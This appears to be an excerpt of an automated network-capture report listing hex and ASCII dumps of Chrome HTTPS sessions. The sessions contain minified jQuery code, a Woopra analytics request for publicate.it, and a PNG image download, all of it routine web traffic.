                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        101192.168.2.5498815.9.57.794436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1030OUTGET /track/ce/?project=publicate.it&instance=woopra&meta=&screen=1280x1024&language=en-US&app=js-client&referer=&cookie=sB4hScRiWkjO&event=pv&timeout=600000&idptnc=eNCnXL5OXflh&ce_campaign_name=powered_by_publicate&ce_campaign_medium=referral&ce_campaign_source=publicate_user_exported_emails&ce_url=%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_title=Publicate%20%7C%20HTML%20Email%20Template%20Builder&ce_domain=publicate.it&ce_uri=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_scroll%20depth=0.17704470037087644&ce_returning=false HTTP/1.1
                                                                                                                                                                                                        Host: www.woopra.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC270INHTTP/1.1 200 OK
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                        content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                        content-length: 67
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC67INData Raw: 69 66 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 2e 77 6f 6f 70 72 61 29 21 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 7b 0a 77 69 6e 64 6f 77 2e 77 6f 6f 70 72 61 2e 6c 61 62 65 6c 73 3d 7b 7d 3b 0a 7d 0a
                                                                                                                                                                                                        Data Ascii: if(typeof(window.woopra)!='undefined'){window.woopra.labels={};}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        102192.168.2.549891104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1036OUTGET /images/template3-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC746INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 97930
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "17e8a-620aa1d1dc5e9"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqovAnRQSyKi2xitpL882zayXjUTVE%2BPlR1KRDEAdL0BtAgs5JzKlyM01Cw7dYUOop1NYpaFYJcmMfqfoxXQW0qwgEY1fprsJx%2BXntixK1h0YylGUNnvrB83H4LEew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615cc2ab88c2d-EWR
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC623INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 09 09 09 fc fd fd d8 cd a2 fc fc fc fb fb fb 62 62 61 e7 ea eb 00 00 00 04 04 03 0e 0e 0e fd e3 72 fc fc fc f5 dd 75 fc fb f9 e6 e5 e0 fe ff ff f4 f3 f0 f6 f6 f7 f7 f7 f8 fb fc fc f5 f7 f7 fe cd 01 fc fd fd ff cd 05 ff cc 05 ec f0 f2 f8 f7 f7 fc fb fb eb ef f1 f9 f9 f9 ed a0 a8 ec ef f3 f5 f5 f5 f6 f6 f7 25 1c 0a ff ff ff 00 00 00 ec 9f a7 fe cb 03 fe ce 05 23 18 07 1f 14 05 fc cd 01 2a 25 15 fd cc 06 b8 64 af 2b 20 0e b6 61 ac 25 20 11 bb 67 b2 80 5e 49 fb cb 05 34 27 13 7c 59 43 31 21 0c 85 63 4f 54 37 1a 81 66 58 89 68 56 72 50 3b 5f 3f 25 db d7 d1 86 6b 5f 3b 2c 16 6c 48 2d 92 75 69 65 43 2a 8d 71 66 79 55 3c 3f 27 0e 4e 30 14 2d
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTEbbaru%#*%d+ a% g^I4'|YC1!cOT7fXhVrP;_?%k_;,lH-uieC*qfyU<?'N0-
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 88 90 9e d8 b1 1a ac a6 9f f8 f5 f2 b4 94 21 0e 09 06 6e 3a 17 f6 cf 2a c1 7a 4f c0 9e 1e e4 be 9c e0 a7 93 fc bd 2b 95 95 96 f2 c6 c4 94 6b 43 d8 b5 93 15 10 0e 98 7b 1c f2 e7 c8 d4 bc a5 b9 8e 66 b6 b5 b4 f6 d2 41 b7 80 5a ef c5 a2 a9 77 4e 4b 1f 15 9e 9f a2 95 85 7d f6 d6 d7 aa aa aa a0 7f 62 f5 d6 5a f6 dd 8c 9c 5b 48 c7 ac 95 2e 2d 29 b6 a1 89 7f 3e 2d f7 a8 1a e6 ce e4 b5 40 06 eb f0 f9 ef d3 b7 95 82 38 a8 8b 6f a9 4f 9e cf 9c c9 d1 8a 88 9e 2b 05 c7 74 76 bf 6d 98 b4 63 66 da b1 d5 e3 93 9b de 8c 25 ea a1 34 ea b7 51 fb f2 c9 9c 4b 8a cb ae 48 aa 2f b2 90 00 00 00 15 74 52 4e 53 01 c0 1a d4 fe 0c fd 05 03 0b fe c0 fd c0 42 e9 67 84 96 a9 c7 bf 53 8c af 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec
                                                                                                                                                                                                        Data Ascii: !n:*zO+kC{fAZwNK}bZ[H.-)>-@8oO+tvmcf%4QKH/tRNSBgSpHYs IDATx
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: d3 f1 c9 50 af 23 8e bf 18 0a 87 3d f9 72 ce 1c 72 04 f8 a4 39 81 2f 53 a1 eb 75 c4 f9 17 3b 1b 40 ff f5 86 a0 bf 4a a0 3f 4f e2 5d 17 6d 73 84 92 6d 21 be 37 d0 1b c8 ea 8d 05 b2 9c bd 81 be 5e 45 56 56 5f 6f bc 2d a6 eb 8d f5 29 5e c6 17 a2 8b b7 b5 25 b2 1c 6d 8e 80 ae 37 16 d0 39 7b 9d 7d 7d 38 69 2c f0 52 be 7e 5e 97 68 0b 91 c0 e3 0c 3a 67 5f 9f 39 d9 9b 4c e8 14 7d 7d 4e 5d 56 20 d6 c7 bf 2c d4 9d c9 8f 7a 93 6d c9 40 34 19 d3 05 7a 63 e6 a4 82 8f c5 9c cf 7f 36 ce f8 fa 5b 00 fd d5 35 a0 53 66 e6 d5 9f 6f fb e7 2b cf 09 7a 3c 10 6d 4b f6 3a 1c 8e 44 dc 6c 76 c4 48 f4 13 8a b8 d9 6c 6e 8b c5 1c 66 73 9c 7f 49 a0 87 7a cd 6d 8e de 04 4e 1a 4d 9d d4 11 7d 19 5f 3f 8f bf 53 a1 c8 0a 24 71 b6 40 d2 ec 68 4b f6 39 e2 7c c8 6c 4e f6 f6 41 d7 bd 9c 8b 0d
                                                                                                                                                                                                        Data Ascii: P#=rr9/Su;@J?O]msm!7^EVV_o-)^%m79{}}8i,R~^h:g_9L}}N]V ,zm@4zc6[5Sfo+z<mK:DlvHlnfsIzmNM}_?S$q@hK9|lNA
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: ea f3 fa ec af 77 bf fd ca 5b 6f bd f5 ca 2b 5f 6f af f9 eb 5f fe 8f f5 7f 37 37 9b cd 1f 35 57 57 37 36 36 36 56 37 9b 0b dd 7e 5b 4d 55 55 95 fa f3 cf 3f af af af ff bc ea c2 9f ff fc d7 9b 7f bd 79 f3 e6 4d 7f 70 c8 6e b1 38 2c 0e b3 a9 b2 b6 14 eb 3f 1b 1b ab d9 32 db dd 43 43 5f da 1d cd cd cd d5 15 15 66 eb 97 ff 1d 89 44 86 ec cd 15 15 15 15 b5 b5 b5 a5 ed 58 9a 76 8d 46 d3 de de ae 2f d5 eb f5 ed ed 74 88 d2 d2 da da da 5a 3a 50 33 3e 45 69 3b 5e 84 d5 2e bc a2 bd bd 5d 1b 72 2a 14 32 a9 54 ca 49 a4 1c c7 49 25 52 a9 04 4b 8a 25 91 48 38 71 49 24 d2 2c f1 97 df 79 49 25 52 89 ac eb da d7 9b 59 75 af 3b 65 bc 4c 86 0f 40 9f 4b 22 e3 e8 de ba e3 c9 64 32 e7 fd 2b 9b 3a e2 d7 5f 7f 7d ed 1e cf 49 d9 e7 90 a6 8e 2d 91 48 0c cf 06 fd 95 ed d9 d9 d9 0d
                                                                                                                                                                                                        Data Ascii: w[o+_o_775WW7666V7~[MUU?yMpn8,?2CC_fDXvF/tZ:P3>Ei;^.]r*2TII%RK%H8qI$,yI%RYu;eL@K"d2+:_}I-H
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 9d 3b 5b d7 50 6f b3 93 76 6f 6e 26 d5 6e 2e b4 5b a1 d7 21 ea 16 cb 07 90 f5 2a 75 fd f6 ba 5d 3b 77 9d 65 92 de 1f 1c 72 5b 09 74 13 90 ac a8 a8 b4 fa 3d a4 f4 71 49 99 1d 30 f6 82 4d 17 21 a7 fb 0c 74 92 74 86 39 7b 8a d9 87 4a b8 12 a6 e6 ca 0a fa 75 63 b5 c9 6c 6e ae 00 ea 22 e6 24 e8 1a 8d 2a 7f ce a9 e0 65 72 a9 94 93 66 65 c1 4d 5a 23 eb 12 fa c1 fe a5 a5 f6 19 17 00 7b bb 2c 2b 03 74 41 d2 85 43 90 6c 4a 65 1c 2f e3 5f 17 3d 2f c1 fe 3e 89 12 70 cf b9 7b 8f e7 15 ec 22 4c 29 1d e6 7c d3 a9 80 39 1d 9f 53 dc fe 2c fb 6b ba 90 04 e3 b0 81 a4 ef 80 7b 98 9d 4d 51 01 47 8a 2c fd 19 37 05 fa e7 55 35 35 b6 a0 f5 a8 b9 b9 d9 6c ff 32 e2 71 a9 29 18 8b 98 9b f1 5f 33 64 cd ec 70 58 04 d0 99 a8 5b ac 43 de d6 b2 fa 8e ba 5d bb ce d6 6d af 57 d7 b8 3c 7e
                                                                                                                                                                                                        Data Ascii: ;[Povon&n.[!*u];wer[t=qI0M!tt9{Jucln"$*erfeMZ#{,+tAClJe/_=/>p{"L)|9S,k{MQG,7U55l2q)_3dpX[C]mW<~
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 90 7d c3 15 2f 11 32 35 d2 94 8e 87 16 64 5f 33 d2 20 42 7e 0e a2 91 0a 96 45 15 80 37 b0 58 08 5a 41 f4 03 c4 04 9f 94 9d 02 7e 9c 54 82 58 9d bf 7d 8d e4 3c 27 9d 46 cb 88 db 53 a0 67 77 20 ae 86 d7 21 e6 d0 64 2c 21 cb d1 91 c4 d4 b1 44 ca c9 c8 4f 58 13 0a ae 93 70 c1 85 cf ce ce b9 76 5b 81 4f 49 4a 63 d3 36 bd e1 f3 2a 18 e7 7a d8 75 af d7 5f 58 29 a6 64 9a 2b ab 9b 60 43 1d 04 35 20 67 2e 38 fd 74 bb 87 22 c1 7e 8f 17 ab df ef a5 2a 0c 40 8f 58 1c 43 7e bf df 7f 93 04 bd ac be 4c ed f2 04 c3 76 f2 e3 ac 76 07 a0 66 fe 3b 03 17 be 39 bc 80 0a 21 2c cf 00 bd d9 d4 4c 17 46 63 63 45 35 04 1c a0 57 94 ea 4b a1 f1 53 a8 97 ea 05 d0 f3 a1 e0 4b a2 06 23 65 bd 18 e8 4c 47 73 a2 ba 4e 6b 69 84 f3 a2 1b ce 71 c8 68 89 aa 41 94 17 a8 49 e6 ac 8b 49 3c bc 25
                                                                                                                                                                                                        Data Ascii: }/25d_3 B~E7XZA~TX}<'FSgw !d,!DOXpv[OIJc6*zu_X)d+`C5 g.8t"~*@XC~Lvvf;9!,LFccE5WKSK#eLGsNkiqhAII<%
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 0f c8 d1 34 08 75 56 dc 4d 65 52 c9 de 33 d4 51 6d 43 71 80 c8 1d 4f e4 04 e9 63 d3 75 c4 44 bd 21 e7 e9 f5 74 e1 0a 10 32 34 0a 62 8c e0 f3 6f 0e f4 21 a0 ce 14 7c 59 55 95 cd ca 24 bd ba 49 4c cc 60 7d 60 07 67 86 64 93 44 7d cd 72 07 fd c1 a0 3f 32 14 b6 5a 23 8c 4e 85 0a ed d9 dd 3b 77 9f 6d a0 74 9d 1f 35 17 16 7c 11 e4 26 87 bf 86 38 37 36 4f 30 6c 35 57 d4 56 54 9b 59 f6 c7 ce 32 7a 64 d9 e1 a7 d5 56 10 e8 40 55 a3 11 04 9d a1 ce e8 53 4c d2 71 43 36 5d 95 3f 18 33 f0 2c 26 cb 4c 9b 67 71 bc 5c ce 01 76 23 fb 52 61 56 41 57 81 9e 26 07 9e 92 31 2c 0f ca f3 0a 61 20 a6 4e 87 01 82 f8 29 35 f2 1c 9f 7a 56 a7 93 70 0a bc d6 68 a4 e7 64 3c 67 bc 77 6d f7 ae dd 58 67 b3 77 b0 3b bb cf a6 65 93 39 e2 8c ef 82 f3 49 64 e9 42 40 1a 72 12 77 4a 01 c8 78 ce
                                                                                                                                                                                                        Data Ascii: 4uVMeR3QmCqOcuD!t24bo!|YU$IL`}`gdD}r?2Z#N;wmt5|&876O0l5WVTY2zdV@USLqC6]?3,&Lgq\v#RaVAW&1,a N)5zVphd<gwmXgw;e9IdB@rwJx
